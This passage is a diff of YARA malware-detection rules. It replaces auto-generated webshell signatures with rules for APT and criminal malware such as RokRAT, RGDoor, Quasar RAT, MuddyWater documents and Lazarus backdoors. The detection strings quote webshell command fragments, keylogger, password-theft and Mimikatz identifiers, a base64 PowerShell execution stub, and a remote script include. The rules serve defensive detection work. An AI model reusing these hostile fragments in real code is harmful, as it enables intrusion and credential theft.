+		$s3 = "ctypes.CFUNCTYPE(ctypes.c_int)" ascii
+		$s4 = "ctypes.memmove" ascii
+		$s5 = "python ended" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Down_Rar_Folder_Down
+rule SIGNATURE_BASE_APT_MAL_Win_Decrok : INKYSQUID
 {
 	meta:
-		description = "Webshells Auto-generated - file down.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e0a0e03-4f01-5b58-807c-0934cdda77ab"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8895-L8906"
+		description = "The DECROK malware family, which uses the victim's hostname to decrypt and execute an embedded payload."
+		author = "threatintel@volexity.com"
+		id = "dc83843d-fd2a-52f1-82e8-8e36b135a0c5"
+		date = "2021-06-23"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L61-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "db47d7a12b3584a2e340567178886e71"
-		logic_hash = "bc666d6333d49a2b01553e1946fc304195193b9be92e26805474e64da61455da"
+		hash = "6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855"
+		logic_hash = "47fa03e95ac17ba7195858cd63b1769e5d56ab8a5edf872b345989b767050b87"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "INKYSQUID"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
+		$v1 = {C7 ?? ?? ?? 01 23 45 67 [2-20] C7 ?? ?? ?? 89 AB CD EF C7 ?? ?? ?? FE DC BA 98}
+		$av1 = "Select * From AntiVirusProduct" wide
+		$av2 = "root\\SecurityCenter2" wide
+		$funcformat = { 25 30 32 78 [0-10] 43 72 65 61 74 65 54 68 72 65 61 64 }
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Cmdshell
+rule SIGNATURE_BASE_APT_NK_Scarcruft_RUBY_Shellcode_XOR_Routine : APT
 {
 	meta:
-		description = "Webshells Auto-generated - file cmdShell.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be256fc4-8dc5-58e4-9ca2-5a1df936b8dd"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8907-L8918"
+		description = "Detects Ruby ShellCode XOR routine used by ScarCruft APT group"
+		author = "S2WLAB_TALON_JACK2"
+		id = "c393f2db-8ade-5083-9cec-f62f23056f8b"
+		date = "2021-05-20"
+		modified = "2023-12-05"
+		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L104-L133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8a9fef43209b5d2d4b81dfbb45182036"
-		logic_hash = "5e7c7537b355b162d58b8bce570b1f94a8e6b479856685a245ffaed8f9482680"
+		logic_hash = "a97041a06729d639c22a4ee272cc96555345b692fc0da8b62e898891d02b23ea"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT"
+		type = "APT"
+		version = "0.1"
 
 	strings:
-		$s1 = "if cmdPath=\"wscriptShell\" then"
+		$hex1 = {C1 C7 0D 40 F6 C7 01 74 ?? 81 F7}
+		$hex2 = {41 C1 C2 0D 41 8B C2 44 8B CA 41 8B CA 41 81 F2}
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Nc
+rule SIGNATURE_BASE_APT_NK_Scarcruft_Evolved_ROKRAT : APT FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file nc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "106209fc-f957-5131-825b-8eb7835625e0"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8919-L8933"
+		description = "Detects RokRAT malware used by ScarCruft APT group"
+		author = "S2WLAB_TALON_JACK2"
+		id = "53cabf41-0154-5372-b667-60d8a7cb9806"
+		date = "2021-07-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L135-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
-		logic_hash = "6106758aedb33f8983f387a58fcd815c47f793cd2a7ea3b0ebed13dd1d5b6e83"
+		logic_hash = "01a2f410687c943d6c6e421ffacfe42f9e7b6afb82e43ba03a8d525e075a3a3c"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "APT, FILE"
+		type = "APT"
+		version = "0.1"
 
 	strings:
-		$s0 = "WSOCK32.dll"
-		$s1 = "?bSUNKNOWNV"
-		$s7 = "p@gram Jm6h)"
-		$s8 = "ser32.dllCONFP@"
+		$AES_IV_KEY = {
+        C7 44 24 ?? 32 31 12 23
+        C7 44 24 ?? 34 45 56 67
+        C7 44 24 ?? 78 89 9A AB
+        C7 44 24 ?? 0C BD CE DF
+        C7 45 ?? 2B 7E A5 16
+        C7 45 ?? 28 AE D2 A6
+        C7 45 ?? AB F7 15 88
+        C7 45 ?? 09 CF 4F 3C
+        }
+		$url_deocde = {
+               80 E9 0F
+               80 F1 C8
+               88 48 ??
+               48 83 EA 01  }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SIGNATURE_BASE_Portlessinst
+
+rule SIGNATURE_BASE_Oilrig_Rgdoor_Gen1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file portlessinst.exe"
+		description = "Detects RGDoor backdoor used by OilRig group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c641c522-7844-5002-8ae7-4aaf60d1337d"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8934-L8947"
+		id = "68ac1f35-4eaa-5899-b66c-296d7c5fa462"
+		date = "2018-01-27"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_rgdoor.yar#L13-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "74213856fc61475443a91cd84e2a6c2f"
-		logic_hash = "72ca80de2ad2048d1fcbbffeebd0e4fd7d9d47d6736360674e6a85ef9943abe8"
-		score = 75
+		logic_hash = "896900f788337327d444495ba0cd4c7c327bb4f9166bc2a981a348cf2c34cbdb"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9c92b29ee05c1522715c7a2f9c543740b60e36373cb47b5620b1f3d8ad96bfa"
 
 	strings:
-		$s2 = "Fail To Open Registry"
-		$s3 = "f<-WLEggDr\""
-		$s6 = "oMemoryCreateP"
+		$c1 = { 00 63 6D 64 24 00 00 00 00 72 00 00 00 00 00 00 00 75 70 6C 6F
+              61 64 24 }
+		$c2 = { 63 61 6E 27 74 20 6F 70 65 6E 20 66 69 6C 65 3A 20 00 00 00 00
+              00 00 00 64 6F 77 6E 6C 6F 61 64 24 }
+		$s1 = "MyNativeModule.dll" fullword ascii
+		$s2 = "RGSESSIONID=" fullword ascii
+		$s3 = "download$" fullword ascii
+		$s4 = ".?AVCHelloWorld@@" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "47cb127aad6c7c9954058e61a2a6429a" or 1 of ( $c* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Setupbdoor
+rule SIGNATURE_BASE_Quasar_RAT_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file SetupBDoor.exe"
+		description = "Detects Quasar RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "055ff783-fa9f-5037-a3d6-88b58ec1612f"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8948-L8959"
+		id = "36220de3-aa1a-5c34-adae-432d939c811e"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_rat.yar#L10-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "41f89e20398368e742eda4a3b45716b6"
-		logic_hash = "b4b6a0e4b9f8975d769d340a420af37dbc344d32c72447a8c56b05e985e6d806"
+		logic_hash = "7cceccb7c283774318f6285b482a422566f4f821eb51d564104205783401931a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
+		hash2 = "1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec"
+		hash3 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
+		hash4 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
 
 	strings:
-		$s1 = "\\BDoor\\SetupBDoor"
+		$s1 = "DoUploadAndExecute" fullword ascii
+		$s2 = "DoDownloadAndExecute" fullword ascii
+		$s3 = "DoShellExecute" fullword ascii
+		$s4 = "set_Processname" fullword ascii
+		$op1 = { 04 1e fe 02 04 16 fe 01 60 }
+		$op2 = { 00 17 03 1f 20 17 19 15 28 }
+		$op3 = { 00 04 03 69 91 1b 40 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Phpshell_3
+rule SIGNATURE_BASE_Quasar_RAT_2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpshell.php"
+		description = "Detects Quasar RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f0ddfef-b3b5-592b-a9fb-fae4d825d0af"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8960-L8972"
+		id = "0ca795c5-3631-5a99-8675-37558485f478"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_rat.yar#L35-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
-		logic_hash = "b86fa40fd7bbcae86926182882faa226530e44c20bc611b8433a7da7f012106c"
+		logic_hash = "b113cb63b0bb75766c905dd3b327b1b2df228733622df8f7517d3daed72432a3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
+		hash2 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
+		hash3 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
 
 	strings:
-		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
-		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
+		$x1 = "GetKeyloggerLogsResponse" fullword ascii
+		$x2 = "get_Keylogger" fullword ascii
+		$x3 = "HandleGetKeyloggerLogsResponse" fullword ascii
+		$s1 = "DoShellExecuteResponse" fullword ascii
+		$s2 = "GetPasswordsResponse" fullword ascii
+		$s3 = "GetStartupItemsResponse" fullword ascii
+		$s4 = "<GetGenReader>b__7" fullword ascii
+		$s5 = "RunHidden" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_BIN_Server
+rule SIGNATURE_BASE_MAL_Quasarrat_May19_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file Server.exe"
+		description = "Detects QuasarRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1625b0ee-5f9f-57d8-8333-f175f46d6c59"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8973-L8989"
+		id = "a4e82b6a-31f8-59fc-acfa-805c4594680a"
+		date = "2019-05-27"
+		modified = "2023-01-06"
+		reference = "https://blog.ensilo.com/uncovering-new-activity-by-apt10"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_rat.yar#L61-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
-		logic_hash = "34f9d78e0f61717fae2945e7a833c2c6d59e28035ee95da2c5d32b4e196bc957"
+		logic_hash = "a189bce433c71d45fd7f5d7fc284fc5b35c88a7ec616dd392d0e931165263aca"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded"
 
 	strings:
-		$s0 = "configserver"
-		$s1 = "GetLogicalDrives"
-		$s2 = "WinExec"
-		$s4 = "fxftest"
-		$s5 = "upfileok"
-		$s7 = "upfileer"
+		$x1 = "Quasar.Common.Messages" ascii fullword
+		$x2 = "Client.MimikatzTools" ascii fullword
+		$x3 = "Resources.powerkatz_x86.dll" ascii fullword
+		$x4 = "Uninstalling... good bye :-(" wide
+		$xc1 = { 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00
+               68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00
+               63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00
+               74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00
+               73 }
+		$xc2 = { 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20
+               00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C
+               00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E
+               00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20
+               00 2F 00 61 00 20 00 2F 00 71 00 20 00 2F 00 66
+               00 20 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006
+rule SIGNATURE_BASE_MAL_RANSOM_COVID19_Apr20_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006.asp"
+		description = "Detects ransomware distributed in COVID-19 theme"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8990-L9001"
+		id = "fc723d1f-e969-5af6-af57-70d00bf797f4"
+		date = "2020-04-15"
+		modified = "2023-12-05"
+		reference = "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_covid_ransom.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c19d6f4e069188f19b08fa94d44bc283"
-		logic_hash = "536232bbdd21bddb88eefe06a82927abcdd3ed10404c052957896960a6d10932"
+		logic_hash = "9b32ce1dff9d27c5f7541de97cd1198b0d837a69ee260b327c66a22ca6f30091"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326"
 
 	strings:
-		$s6 = "strBackDoor = strBackDoor "
+		$s1 = "/savekey.php" wide
+		$op1 = { 3f ff ff ff ff ff 0b b4 }
+		$op2 = { 60 2e 2e 2e af 34 34 34 b8 34 34 34 b8 34 34 34 }
+		$op3 = { 1f 07 1a 37 85 05 05 36 83 05 05 36 83 05 05 34 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
 }
-rule SIGNATURE_BASE_R57Shell_3
+rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
+		description = "Detects malicious document used by MuddyWater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4129d77c-2981-587b-a83e-8767dc3a48d8"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9002-L9013"
+		id = "5f275ee8-c6a9-532b-bc82-b109195171da"
+		date = "2018-02-26"
+		modified = "2023-12-05"
+		reference = "Internal Research - TI2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_muddywater.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "87995a49f275b6b75abe2521e03ac2c0"
-		logic_hash = "0fdca080c7ce57b7bd818a968840aebf3c5c74f188ed062fec794bfadb4e75b0"
+		logic_hash = "b675b004f86695821737b7fc05276c8350e44f5822ec458a74658f895ccf7082"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
 
 	strings:
-		$s1 = "<b>\".$_POST['cmd']"
+		$x1 = "aWV4KFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmco" ascii
+		$x2 = "U1FCdUFIWUFid0JyQUdVQUxRQkZBSGdBY0FCeUFHVUFjd0J6QUdrQWJ3QnVBQ0FBS"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_Hdconfig
+rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file HDConfig.exe"
+		description = "Detects malicious document used by MuddyWater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6f743137-e85a-5298-b51e-c8792e507d28"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9014-L9029"
+		id = "117e1d33-63a3-52c8-acf6-bc61959193db"
+		date = "2018-02-26"
+		modified = "2023-12-05"
+		reference = "Internal Research - TI2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_muddywater.yar#L28-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7d60e552fdca57642fd30462416347bd"
-		logic_hash = "9001f79db15548cf3ca931d0043d078db7d900ab26093afbf5cd44d0a85800f4"
-		score = 60
-		quality = 55
-		tags = ""
+		logic_hash = "b198396d27b32f8aa57a25cd6e33deb2bcfb726731e2e07f8b9d50b5f6ff13a0"
+		score = 75
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
+		hash2 = "366d8b84a43a528e6aaf9ecfc38980b148f983967803914471ccf011b9bb0832"
 
 	strings:
-		$s0 = "An encryption key is derived from the password hash. "
-		$s3 = "A hash object has been created. "
-		$s4 = "Error during CryptCreateHash!"
-		$s5 = "A new key container has been created."
-		$s6 = "The password has been added to the hash. "
+		$s1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" fullword wide
+		$s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
+		$s3 = "*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Office16\\MSWORD.OLB#Microsoft Word 16.0 O" wide
+		$s4 = "scripting.filesystemobject$" fullword ascii
+		$s5 = "ID=\"{00000000-0000-0000-0000-000000000000}\"" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 6000KB and all of them
 }
-rule SIGNATURE_BASE_FSO_S_Ajan_2
+rule SIGNATURE_BASE_MAL_Muddywater_Droppedtask_Jun18_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ajan.asp"
+		description = "Detects a dropped Windows task as used by MudyWater in June 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a66c34ed-0ae2-5e04-bfc4-c82583c5e066"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9030-L9042"
+		id = "d9ef379d-161f-59f1-873e-3af12b24b76b"
+		date = "2018-06-12"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/719c94eb-0a00-47cc-b583-ad4f9e25ebdb"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_muddywater.yar#L48-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "22194f8c44524f80254e1b5aec67b03e"
-		logic_hash = "0ac31ee735c94289932369dfba5b408cbf71cc23fd48ce3e09dc7ce640a0d733"
+		logic_hash = "776ae1adab223ae258d1c1c0c501e177dafe196964a2ede31789a7caa8495b2d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ecc2e1817f655ece2bde39b7d6633f4f586093047ec5697a1fab6adc7e1da54"
 
 	strings:
-		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
-		$s3 = "/file.zip"
+		$x1 = "%11%\\scrobj.dll,NI,c:" wide
+		$s1 = "AppAct = \"SOFTWARE\\Microsoft\\Connection Manager\"" fullword wide
+		$s2 = "[DefenderService]" fullword wide
+		$s3 = "UnRegisterOCXs=EventManager" fullword wide
+		$s4 = "ShortSvcName=\" \"" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xfeff and filesize < 1KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Webshell_And_Exploit_CN_APT_HK : WEBSHELL
+rule SIGNATURE_BASE_APT_NK_Lazarus_RC4_Loop : FILE
 {
 	meta:
-		description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb37a22b-4e8a-5986-bd47-4ef5b4986f47"
-		date = "2014-10-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9044-L9059"
+		description = "Detects RC4 loop in Lazarus Group implant"
+		author = "f-secure "
+		id = "a9503795-b4b8-505e-a1bf-df64ec8c1c32"
+		date = "2020-06-10"
+		modified = "2023-12-05"
+		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_aug20.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec3f1e985585e1bf77a46e971a20cd127064a64467761a5a570548dd63ec57e2"
-		score = 50
+		logic_hash = "b0e96bfff924a0c9b39e1ab03097ae0790743417d9da70917d64bc238905971e"
+		score = 75
 		quality = 85
-		tags = "WEBSHELL"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
-		$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
-		$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
+		$str_rc4_loop = { 41 FE 8? 00 01 00 00 45 0F B6 ?? 00 01 00 00 48
+                        FF C? 43 0F B6 0? ?? 41 00 8? 01 01 00 00 41 0F
+                        B6 ?? 01 01 00 00 }
 
 	condition:
-		$a0 or ( all of ( $s* ) )
+		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and $str_rc4_loop
 }
-rule SIGNATURE_BASE_JSP_Browser_APT_Webshell
+rule SIGNATURE_BASE_APT_NK_Lazarus_Network_Backdoor_Unpacked : FILE
 {
 	meta:
-		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
-		author = "Florian Roth (Nextron Systems)"
-		id = "06988b5b-ec8b-5a10-b659-3e846057ea51"
-		date = "2014-10-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9061-L9075"
+		description = "Detects unpacked variant of Lazarus Group network backdoor"
+		author = "f-secure"
+		id = "8eda9e74-1a19-5510-82d8-cd2eb324629c"
+		date = "2020-06-10"
+		modified = "2023-12-05"
+		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_aug20.yar#L17-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a352bf394f1b4f70218650758db39225a5a505656299405ccd077592d29480a7"
-		score = 60
-		quality = 85
-		tags = ""
+		logic_hash = "bfc3cf400eeea332e2e44b65f9728e94af0adde76b32ed4be527b25484f80745"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
-		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
